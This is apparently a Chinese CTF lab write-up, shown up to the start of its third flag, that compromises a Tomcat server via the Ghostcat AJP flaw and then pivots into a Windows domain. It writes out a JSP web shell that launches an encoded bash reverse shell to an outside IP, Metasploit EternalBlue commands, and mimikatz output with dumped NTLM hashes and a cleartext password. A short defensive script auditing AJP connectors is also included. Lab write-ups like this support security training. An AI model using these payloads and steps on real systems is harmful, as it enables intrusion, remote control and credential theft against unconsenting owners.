春秋云镜 Spoofing

Preface

The tools used in this post can be found in the following repository:

Awesome_Pentest_Tools: a one-stop collection of penetration testing and red team tools, intended to help pentesters build their own toolchain

Target description:

Spoofing is a medium-difficulty lab environment. Completing it helps players learn the proxy forwarding, internal network scanning, information gathering, privilege escalation and lateral movement techniques used in internal network penetration, deepen their understanding of the core authentication mechanisms of a domain environment, and pick up some interesting technical points of domain penetration. The lab has 4 flags, spread across different hosts.

flag1

CVE-2020-1938

Run fscan over the target

./fscanPlus -h 39.99.132.128

______ _____ _
| ____| | __ \| |
| |__ ___ ___ __ _ _ __ | |__) | |_ _ ___
| __/ __|/ __/ _ | _ \| ___/| | | | / __|
| | \__ \ (_| (_| | | | | | | | |_| \__ \
|_| |___/\___\__,_|_| |_|_| |_|\__,_|___/
fscan version: 1.8.4 TeamdArk5 v1.0
start infoscan
39.99.132.128:22 open
39.99.132.128:8080 open
39.99.132.128:8009 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.99.132.128:8080 code:200 len:7091 title:后台管理
已完成 3/3
[*] 扫描结束,耗时: 43.341745316s

┌──(matrix㉿matrix)-[~/Desktop/FscanPlus]
└─$ ./fscanPlus -h 39.99.132.128 -p 1-65535

______ _____ _
| ____| | __ \| |
| |__ ___ ___ __ _ _ __ | |__) | |_ _ ___
| __/ __|/ __/ _ | _ \| ___/| | | | / __|
| | \__ \ (_| (_| | | | | | | | |_| \__ \
|_| |___/\___\__,_|_| |_|_| |_|\__,_|___/
fscan version: 1.8.4 TeamdArk5 v1.0
start infoscan
39.99.132.128:53 open
39.99.132.128:22 open
39.99.132.128:8009 open
39.99.132.128:8080 open
[*] alive ports len is: 4
start vulscan
已完成 0/4 [-] webtitle http://39.99.132.128:53 Get "http://39.99.132.128:53": read tcp 192.168.230.133:35242->39.99.132.128:53: read: connection reset by peer
[*] WebTitle http://39.99.132.128:8080 code:200 len:7091 title:后台管理
已完成 4/4
[*] 扫描结束,耗时: 4m42.749203482s

Then run a vulnerability scanner

nuclei -u http://39.99.132.128:8080/
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10

projectdiscovery.io

[WRN] Found 1 templates with syntax error (use -validate flag for further examination)
[INF] Current nuclei version: v3.4.10 (outdated)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 8497
[INF] Executing 8295 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 202 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1796 (Reduced 1685 Requests)
[options-method] [http] [info] http://39.99.132.128:8080/ ["OPTIONS, GET, HEAD, POST"]
[tomcat-scripts] [http] [info] http://39.99.132.128:8080/examples/jsp/index.html
[tomcat-scripts] [http] [info] http://39.99.132.128:8080/examples/websocket/index.xhtml
[tomcat-stacktraces] [http] [low] http://39.99.132.128:8080/?f=\[
[tomcat-scripts] [http] [info] http://39.99.132.128:8080/examples/servlets/servlet/SessionExample
[http-missing-security-headers:x-frame-options] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:x-content-type-options] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:clear-site-data] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:strict-transport-security] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:content-security-policy] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:referrer-policy] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:permissions-policy] [http] [info] http://39.99.132.128:8080/
[tomcat-detect:version] [http] [info] http://39.99.132.128:8080/docs/introduction.html ["9.0.30"]
[INF] Scan completed in 1m. 17 matches found.

Tomcat version disclosure

[tomcat-detect:version] .../docs/introduction.html ["9.0.30"]

The exact Tomcat version (9.0.30) is exposed, so an attacker can go after the known vulnerabilities of that version.

searchsploit tomcat      
---------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------- ---------------------------------
4D WebSTAR 5.3/5.4 Tomcat Plugin - Remote Buffer Ov | osx/remote/25626.c
Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked | unix/dos/22068.pl
Apache Commons FileUpload and Apache Tomcat - Denia | multiple/dos/31615.rb
Apache Tomcat (Windows) - 'runtime.getRuntime().exe | windows/local/7264.txt
Apache Tomcat - 'WebDAV' Remote File Disclosure | multiple/remote/4530.pl
Apache Tomcat - Account Scanner / 'PUT' Request Com | multiple/remote/18619.txt
Apache Tomcat - AJP 'Ghostcat File Read/Inclusion | multiple/webapps/48143.py
Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion | multiple/webapps/49039.rb
Apache Tomcat - CGIServlet enableCmdLineArguments R | windows/remote/47073.rb
Apache Tomcat - Cookie Quote Handling Remote Inform | multiple/remote/9994.txt
Apache Tomcat - Form Authentication 'Username' Enum | multiple/remote/9995.txt
Apache Tomcat - WebDAV SSL Remote File Disclosure | linux/remote/4552.pl
Apache Tomcat / Geronimo 1.0 - 'Sample Script cal2. | multiple/remote/27095.txt
Apache Tomcat 10.1 - Denial Of Service | multiple/dos/51262.py
Apache Tomcat 10.1.39 - Denial of Service (DoS) | multiple/remote/52318.py
Apache Tomcat 11.0.3 - Remote Code Execution | multiple/webapps/52134.txt
Apache Tomcat 3.0 - Directory Traversal | windows/remote/20716.txt
Apache Tomcat 3.1 - Path Revealing | multiple/remote/20131.txt
Apache Tomcat 3.2 - 404 Error Page Cross-Site Scrip | multiple/remote/33379.txt
Apache Tomcat 3.2 - Directory Disclosure | unix/remote/21882.txt
Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scr | multiple/webapps/10292.txt
Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Informat | multiple/remote/21492.txt
Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Informatio | multiple/remote/21490.txt
Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root | multiple/remote/21491.txt
Apache Tomcat 3.x - Null Byte Directory / File Disc | linux/remote/22205.txt
Apache Tomcat 3/4 - 'DefaultServlet' File Disclosur | unix/remote/21853.txt
Apache Tomcat 3/4 - JSP Engine Denial of Service | linux/dos/21534.jsp
Apache Tomcat 4.0.3 - Denial of Service 'Device Nam | windows/webapps/21605.txt
Apache Tomcat 4.0.3 - Requests Containing MS-DOS De | multiple/remote/31551.txt
Apache Tomcat 4.0.3 - Servlet Mapping Cross-Site Sc | linux/remote/21604.txt
Apache Tomcat 4.0.x - Non-HTTP Request Denial of Se | linux/dos/23245.pl
Apache Tomcat 4.0/4.1 - Servlet Full Path Disclosur | unix/remote/21412.txt
Apache Tomcat 4.1 - JSP Request Cross-Site Scriptin | unix/remote/21734.txt
Apache Tomcat 5 - Information Disclosure | multiple/remote/28254.txt
Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Inf | multiple/remote/12343.txt
Apache Tomcat 5.5.15 - cal2.jsp Cross-Site Scriptin | jsp/webapps/30563.txt
Apache Tomcat 5.5.25 - Cross-Site Request Forgery | multiple/webapps/29435.txt
Apache Tomcat 5.x/6.0.x - Directory Traversal | linux/remote/29739.txt
Apache Tomcat 6.0.10 - Documentation Sample Applica | multiple/remote/30052.txt
Apache Tomcat 6.0.13 - Host Manager Servlet Cross-S | multiple/remote/30495.html
Apache Tomcat 6.0.13 - Insecure Cookie Handling Quo | multiple/remote/30496.txt
Apache Tomcat 6.0.13 - JSP Example Web Applications | jsp/webapps/30189.txt
Apache Tomcat 6.0.15 - Cookie Quote Handling Remote | multiple/remote/31130.txt
Apache Tomcat 6.0.16 - 'HttpServletResponse.sendErr | multiple/remote/32138.txt
Apache Tomcat 6.0.16 - 'RequestDispatcher' Informat | multiple/remote/32137.txt
Apache Tomcat 6.0.18 - Form Authentication Existing | multiple/remote/33023.txt
Apache Tomcat 6/7/8/9 - Information Disclosure | multiple/remote/41783.txt
Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site | linux/remote/35011.txt
Apache Tomcat 8/7/6 (Debian-Based Distros) - Local | linux/local/40450.txt
Apache Tomcat 8/7/6 (RedHat Based Distros) - Local | linux/local/40488.txt
Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS) | multiple/webapps/50119.txt
Apache Tomcat 9.0.0.M1 - Open Redirect | multiple/webapps/50118.txt
Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | multiple/remote/6229.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 | jsp/webapps/42966.py
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 | windows/webapps/42953.txt
Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote | linux/remote/5386.txt
Apache Tomcat Connector mod_jk - 'exec-shield' Remo | linux/remote/4162.c
Apache Tomcat Manager - Application Deployer (Authe | multiple/remote/16317.rb
Apache Tomcat Manager - Application Upload (Authent | multiple/remote/31433.rb
Apache Tomcat mod_jk 1.2.20 - Remote Buffer Overflo | windows/remote/16798.rb
Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerS | php/remote/28713.php
AWStats 6.x - Apache Tomcat Configuration File Arbi | cgi/webapps/35035.txt
Jakarta Tomcat 3.x/4.0 - Error Message Information | unix/local/21073.txt
Tomcat - Remote Code Execution via JSP Upload Bypas | java/remote/43008.rb
Tomcat 3.0/3.1 Snoop Servlet - Information Disclosu | multiple/remote/20132.txt
Tomcat 3.2.1/4.0 / Weblogic Server 5.1 - URL JSP Re | multiple/remote/20719.txt
Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escap | java/webapps/47892.txt
---------------------------------------------------- ---------------------------------
Shellcodes: No Results
---------------------------------------------------- ---------------------------------
Paper Title | Path
---------------------------------------------------- ---------------------------------
Hardening & messing with win32 Apache Tomcat | english/12878-hardening-&-messin
---------------------------------------------------- ---------------------------------

searchsploit lists Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (48143.py, 49039.rb)

Port 8009 is open here, which is the AJP protocol, and that is suspicious. Although the nuclei scan did not report anything directly related to AJP, Tomcat 9.0.30 is within the range affected by Ghostcat (CVE-2020-1938), so if the AJP port has not been hardened it is at risk of exploitation.
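
As an added defender-side check (not code from this post or from the Ghostcat PoC it uses), the following script parses a Tomcat server.xml and reports every enabled AJP connector that is reachable the way Ghostcat needs: bound beyond loopback, or running without a shared secret. Both server.xml samples are constructed for this example; the fix releases 9.0.31 / 8.5.51 / 7.0.100 made loopback binding and a required secret the defaults, which is why a stock 9.0.30 connector on port 8009 is exposed.

```python
import xml.etree.ElementTree as ET

# Bind addresses from which an AJP connector cannot be reached by other hosts.
LOOPBACK = {"127.0.0.1", "::1", "localhost", "0:0:0:0:0:0:0:1"}


def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding per enabled AJP connector in a Tomcat server.xml.

    ElementTree drops XML comments, so a commented-out connector (the stock
    Tomcat 9 default) is never reported: only connectors that are actually
    enabled are audited, which is also the only kind Ghostcat can reach.
    """
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        protocol = conn.get("protocol", "HTTP/1.1")
        if "ajp" not in protocol.lower():  # "AJP/1.3" or org.apache.coyote.ajp.*
            continue
        issues = []
        address = conn.get("address")
        if address is None:
            # Tomcat < 9.0.31 / 8.5.51 / 7.0.100 bound AJP to every interface when
            # no address was set; the Ghostcat fix releases default to loopback.
            issues.append("no address attribute: all interfaces on pre-fix Tomcat (e.g. 9.0.30)")
        elif address not in LOOPBACK:
            issues.append(f"bound to non-loopback address {address}")
        if conn.get("secretRequired", "true").lower() == "false":
            issues.append("secretRequired explicitly disabled")
        if not conn.get("secret"):
            issues.append("no shared secret: any client reaching the port can speak AJP")
        findings.append({"port": conn.get("port", "8009"), "protocol": protocol, "issues": issues})
    return findings


def ajp_exposed(server_xml: str) -> bool:
    """True when at least one enabled AJP connector has an issue."""
    return any(f["issues"] for f in audit_ajp_connectors(server_xml))


# Constructed sample 1: the pre-fix stock configuration, which is what an open
# 8009 on Tomcat 9.0.30 looks like (AJP enabled, no address, no secret).
EXPOSED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps" />
    </Engine>
  </Service>
</Server>
"""

# Constructed sample 2: the hardened form. The old connector is commented out and
# the replacement is loopback-only with a shared secret the reverse proxy must send.
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <!-- <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" /> -->
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE-WITH-A-LONG-RANDOM-SECRET"
               redirectPort="8443" />
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps" />
    </Engine>
  </Service>
</Server>
"""

if __name__ == "__main__":
    for name, xml in (("exposed", EXPOSED_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        for f in audit_ajp_connectors(xml):
            print(name, f["port"], f["protocol"], f["issues"] or "OK")
```

If AJP is not needed at all (no mod_jk / reverse proxy in front), the right fix is to leave the connector commented out, which this audit then reports as no connector.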

Apache Tomcat - AJP 'Ghostcat File Read/Inclusion   | multiple/webapps/48143.py
Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion | multiple/webapps/49039.rb

Kali Linux ships exploitdb by default, so these scripts are already on disk under /usr/share/exploitdb/

# locate 48143.py shows the script at /usr/share/exploitdb/exploits/multiple/webapps/48143.py
# copy the script into the current directory
searchsploit -m 48143

The PoC above should work, but here the GitHub PoC Ghostcat-CNVD-2020-10487 is used directly

python ajpShooter.py http://39.99.132.128:8080 8009 /WEB-INF/web.xml read
/home/matrix/Desktop/Ghostcat-CNVD-2020-10487/ajpShooter.py:363: SyntaxWarning: invalid escape sequence '\ '

_ _ __ _ _
/_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __
//_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
/ _ \| | |_) | _\ \ | | | (_) | (_) | || __/ |
\_/ \_// | .__/ \__/_| |_|\___/ \___/ \__\___|_|
|__/|_|
00theway,just for test


[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"2489-1670857638305"
[<] Last-Modified: Mon, 12 Dec 2022 15:07:18 GMT
[<] Content-Type: application/xml
[<] Content-Length: 2489

<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
<display-name>Archetype Created Web Application</display-name>

<security-constraint>
<display-name>Tomcat Server Configuration Security Constraint</display-name>
<web-resource-collection>
<web-resource-name>Protected Area</web-resource-name>
<url-pattern>/upload/*</url-pattern>
</web-resource-collection>
<auth-constraint>
<role-name>admin</role-name>
</auth-constraint>
</security-constraint>

<error-page>
<error-code>404</error-code>
<location>/404.html</location>
</error-page>

<error-page>
<error-code>403</error-code>
<location>/error.html</location>
</error-page>

<error-page>
<exception-type>java.lang.Throwable</exception-type>
<location>/error.html</location>
</error-page>

<servlet>
<servlet-name>HelloServlet</servlet-name>
<servlet-class>com.example.HelloServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>HelloServlet</servlet-name>
<url-pattern>/HelloServlet</url-pattern>
</servlet-mapping>

<servlet>
<display-name>LoginServlet</display-name>
<servlet-name>LoginServlet</servlet-name>
<servlet-class>com.example.LoginServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>LoginServlet</servlet-name>
<url-pattern>/LoginServlet</url-pattern>
</servlet-mapping>

<servlet>
<display-name>RegisterServlet</display-name>
<servlet-name>RegisterServlet</servlet-name>
<servlet-class>com.example.RegisterServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>RegisterServlet</servlet-name>
<url-pattern>/RegisterServlet</url-pattern>
</servlet-mapping>

<servlet>
<display-name>UploadTestServlet</display-name>
<servlet-name>UploadTestServlet</servlet-name>
<servlet-class>com.example.UploadTestServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>UploadTestServlet</servlet-name>
<url-pattern>/UploadServlet</url-pattern>
</servlet-mapping>

<servlet>
<display-name>DownloadFileServlet</display-name>
<servlet-name>DownloadFileServlet</servlet-name>
<servlet-class>com.example.DownloadFileServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadFileServlet</servlet-name>
<url-pattern>/DownloadServlet</url-pattern>
</servlet-mapping>
</web-app>

From the sensitive information above, there is an UploadServlet that allows file upload, so a file inclusion can be turned into RCE

http://39.99.132.128:8080/UploadServlet


Contents of the uploaded malicious file

bash -i >& /dev/tcp/公网IP/54500 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC43NC4yMy81NDUwMCAwPiYx

<%
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC43NC4yMy81NDUwMCAwPiYx}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
%>

File uploaded successfully

Files are stored in ./upload/4402ca1950948073bfb147acf9c4fa9a/20250925023751519.txt


Catch the shell with pwncat

source pwncat-env/bin/activate
(pwncat-env) root@iZ2ze29dp43ju4ubdmpjfeZ:~# pwncat-cs -lp 54500

Command execution

python ajpShooter.py http://39.99.132.128:8080 8009 /upload/4402ca1950948073bfb147acf9c4fa9a/20250925023751519.txt eval

Read the flag

(remote) root@ubuntu:/# cat /root/flag/flag01.txt
████████ ████ ██
██░░░░░░ ██████ ░██░ ░░ █████
░██ ░██░░░██ ██████ ██████ ██████ ██ ███████ ██░░░██
░█████████░██ ░██ ██░░░░██ ██░░░░██░░░██░ ░██░░██░░░██░██ ░██
░░░░░░░░██░██████ ░██ ░██░██ ░██ ░██ ░██ ░██ ░██░░██████
░██░██░░░ ░██ ░██░██ ░██ ░██ ░██ ░██ ░██ ░░░░░██
████████ ░██ ░░██████ ░░██████ ░██ ░██ ███ ░██ █████
░░░░░░░░ ░░ ░░░░░░ ░░░░░░ ░░ ░░ ░░░ ░░ ░░░░░

This is the first flag you get.

flag01: flag{10e32b00-2f48-45a1-b407-760619d715ef}

flag2

Run fscan from the foothold

(remote) root@ubuntu:/# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.11.76 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe2d:df1e prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:2d:df:1e txqueuelen 1000 (Ethernet)
RX packets 524699 bytes 200721993 (200.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 422119 bytes 46669746 (46.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1386 bytes 127072 (127.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1386 bytes 127072 (127.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

(remote) root@ubuntu:/# ./fscan -h 172.22.11.76/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.11.6 is alive
(icmp) Target 172.22.11.76 is alive
(icmp) Target 172.22.11.45 is alive
(icmp) Target 172.22.11.26 is alive
[*] Icmp alive hosts len is: 4
172.22.11.76:22 open
172.22.11.6:445 open
172.22.11.26:139 open
172.22.11.45:139 open
172.22.11.6:139 open
172.22.11.26:135 open
172.22.11.45:135 open
172.22.11.6:135 open
172.22.11.76:8080 open
172.22.11.26:445 open
172.22.11.45:445 open
172.22.11.6:88 open
172.22.11.76:8009 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo
[*]172.22.11.26
[->]XR-LCM3AE8B
[->]172.22.11.26
[*] NetInfo
[*]172.22.11.6
[->]XIAORANG-DC
[->]172.22.11.6
[+] MS17-010 172.22.11.45 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.11.26 XIAORANG\XR-LCM3AE8B
[*] NetBios 172.22.11.6 [+] DC:XIAORANG\XIAORANG-DC
[*] NetBios 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.11.76:8080 code:200 len:7091 title:后台管理
已完成 13/13
[*] 扫描结束,耗时: 7.762083908s

# looks incomplete, widen the IP range
./fscan -h 172.22.11.76/16

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.11.76 is alive
(icmp) Target 172.22.11.6 is alive
(icmp) Target 172.22.11.45 is alive
(icmp) Target 172.22.11.26 is alive
(icmp) Target 172.22.255.253 is alive
[*] LiveTop 172.22.0.0/16 段存活数量为: 5
[*] LiveTop 172.22.11.0/24 段存活数量为: 4
[*] Icmp alive hosts len is: 5
[*] LiveTop 172.22.255.0/24 段存活数量为: 1
172.22.11.26:445 open
172.22.11.6:445 open
172.22.11.45:445 open
172.22.11.26:139 open
172.22.11.45:139 open
172.22.11.6:139 open
172.22.11.26:135 open
172.22.11.45:135 open
172.22.11.6:135 open
172.22.11.6:88 open
[*] alive ports len is: 10
start vulscan
[*] NetInfo
[*]172.22.11.6
[->]XIAORANG-DC
[->]172.22.11.6
[*] NetInfo
[*]172.22.11.26
[->]XR-LCM3AE8B
[->]172.22.11.26
[*] NetBios 172.22.11.6 [+] DC:XIAORANG\XIAORANG-DC
[*] NetBios 172.22.11.26 XIAORANG\XR-LCM3AE8B
[*] NetBios 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[+] MS17-010 172.22.11.45 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
已完成 10/10
[*] 扫描结束,耗时: 9.960776234s

Summary of the hosts found

(icmp) Target 172.22.11.76    is alive
(icmp) Target 172.22.11.6 DC:XIAORANG\XIAORANG-DC
(icmp) Target 172.22.11.45 XR-DESKTOP.xiaorang.lab(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
(icmp) Target 172.22.11.26 XIAORANG\XR-LCM3AE8B
(icmp) Target 172.22.255.253 is alive

ms17_010


Go straight for EternalBlue

# did not work
use exploit/windows/smb/ms17_010_eternalblue
set proxies socks5:127.0.0.1:55556
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.11.45
set lport 54524
run

# worked
use exploit/windows/smb/ms17_010_eternalblue
set proxies socks5:127.0.0.1:55556
set payload payload/windows/x64/meterpreter/bind_tcp
set rhosts 172.22.11.45
set lport 54524
run

Get the flag; the execute command can be used to run files

PS C:\Windows\system32> cat C:/users/administrator/flag/flag02.txt
cat C:/users/administrator/flag/flag02.txt
##
:####: :#### ##
:###### ##### ##
##: :# ##
## ##.###: .####. .####. ####### #### ##.#### :###:##
###: #######: .######. .######. ####### #### ####### .#######
:#####: ### ### ### ### ### ### ## ## ### :## ### ###
.#####: ##. .## ##. .## ##. .## ## ## ## ## ##. .##
:### ## ## ## ## ## ## ## ## ## ## ## ##
## ##. .## ##. .## ##. .## ## ## ## ## ##. .##
#:. :## ### ### ### ### ### ### ## ## ## ## ### ###
#######: #######: .######. .######. ## ######## ## ## .#######
.#####: ##.###: .####. .####. ## ######## ## ## :###:##
## #. :##
## ######
## :####:


flag02: flag{ffd82b2a-8762-4dd2-95c2-bae51147e03b}

flag3

PetitPotam coerced authentication

List the tickets

Two accounts are obtained: the machine account xr-desktop$ and the user yangmei

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username Domain NTLM SHA1
-------- ------ ---- ----
XR-DESKTOP$ XIAORANG 738dcc0171b84e1a36400008983a3e10 fdc3f1fd9d44fea97d24ce212d6339ec890cfdf4
yangmei XIAORANG 25e42ef4cc0ab6a8ff9e3edbbda91841 6b2838f81b57faed5d860adaf9401b0edb269a6f

wdigest credentials
===================

Username Domain Password
-------- ------ --------
(null) (null) (null)
XR-DESKTOP$ XIAORANG 7d c7 ba cf 2e 52 36 1a 8a 7c 53 e3 dc 71 7e d4 3a 3e c1 e5 60 0d 09 2a a6 b2 b3 73 19 32 1f d8 7d 28 69 48 fe 7a 4c 28 32 49 58 e9 47 71 98 8e 51 c0 80 74 ed 14 91 fb e0 43 21 37 75 cf d
5 91 53 0f 96 03 48 99 1d 54 34 52 71 96 b0 a2 af 96 96 c4 18 53 4b 71 f6 72 22 2b 74 64 69 05 38 e9 d6 a2 22 cc 3a 98 f2 7d aa f2 e0 07 ee 92 8c 31 24 fa 42 c4 94 1b e5 8e c4 df 80 c0 09
7b aa af dd cd 8f 86 08 e1 41 4d 53 2e 0d d8 91 2f d8 36 a8 1f 7a e8 0d 47 a4 16 1a c4 56 b9 e0 96 13 ef c9 70 8c 64 8d 9a d5 75 7f 2f 3d c4 36 5e 1f 8a 16 6c 9e aa 11 01 b1 13 ab 0d f8
dd 98 3a d1 01 b6 e1 f5 51 50 82 eb 02 b5 bb c0 cc 4b 63 f4 71 0f 2c 49 de 19 3d a3 cf ab 32 29 a6 69 04 77 76 63 a7 3a 5a b9 f6 7f 97 b9 6b ff 22 84 6e 22 9d
yangmei XIAORANG xrihGHgoNZQ

kerberos credentials
====================

Username Domain Password
-------- ------ --------
(null) (null) (null)
xr-desktop$ XIAORANG.LAB 7d c7 ba cf 2e 52 36 1a 8a 7c 53 e3 dc 71 7e d4 3a 3e c1 e5 60 0d 09 2a a6 b2 b3 73 19 32 1f d8 7d 28 69 48 fe 7a 4c 28 32 49 58 e9 47 71 98 8e 51 c0 80 74 ed 14 91 fb e0 43 21 37 75
cf d5 91 53 0f 96 03 48 99 1d 54 34 52 71 96 b0 a2 af 96 96 c4 18 53 4b 71 f6 72 22 2b 74 64 69 05 38 e9 d6 a2 22 cc 3a 98 f2 7d aa f2 e0 07 ee 92 8c 31 24 fa 42 c4 94 1b e5 8e c4 df
80 c0 09 7b aa af dd cd 8f 86 08 e1 41 4d 53 2e 0d d8 91 2f d8 36 a8 1f 7a e8 0d 47 a4 16 1a c4 56 b9 e0 96 13 ef c9 70 8c 64 8d 9a d5 75 7f 2f 3d c4 36 5e 1f 8a 16 6c 9e aa 11 01 b1
13 ab 0d f8 dd 98 3a d1 01 b6 e1 f5 51 50 82 eb 02 b5 bb c0 cc 4b 63 f4 71 0f 2c 49 de 19 3d a3 cf ab 32 29 a6 69 04 77 76 63 a7 3a 5a b9 f6 7f 97 b9 6b ff 22 84 6e 22 9d
xr-desktop$ XIAORANG.LAB (null)
yangmei XIAORANG.LAB xrihGHgoNZQ

A quick run-through of what was tried (one-sentence summary: the DC cannot be taken directly)

  1. Sprayed the collected passwords/hashes against the usernames gathered with BloodHound; no new users found
  2. MAQ = 0, so no computer account can be added
  3. The current LDAP has no TLS, so a computer cannot be added remotely either; impacket's addcomputer has two methods, samr and ldaps. samr is blocked by MAQ = 0, and ldaps is blocked by the lack of TLS plus MAQ = 0
  4. The DC is vulnerable to noPac, but noPac with the current user yangmei did not succeed, and she has no CreateChild ACL on the domain's Computers container
  5. The DC is vulnerable to noPac, but the current user yangmei has no WriteDacl on the current Windows machine xr-desktop, meaning SamAccountName cannot be modified
  6. DFSCoerce and PetitPotam are both present in the domain, but CVE-2019-1040 is not, so DFSCoerce is dropped and PetitPotam is preferred
  7. NoPac exploit: Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)

The lab hints at NTLM, so use cme to check for WebClient and PetitPotam

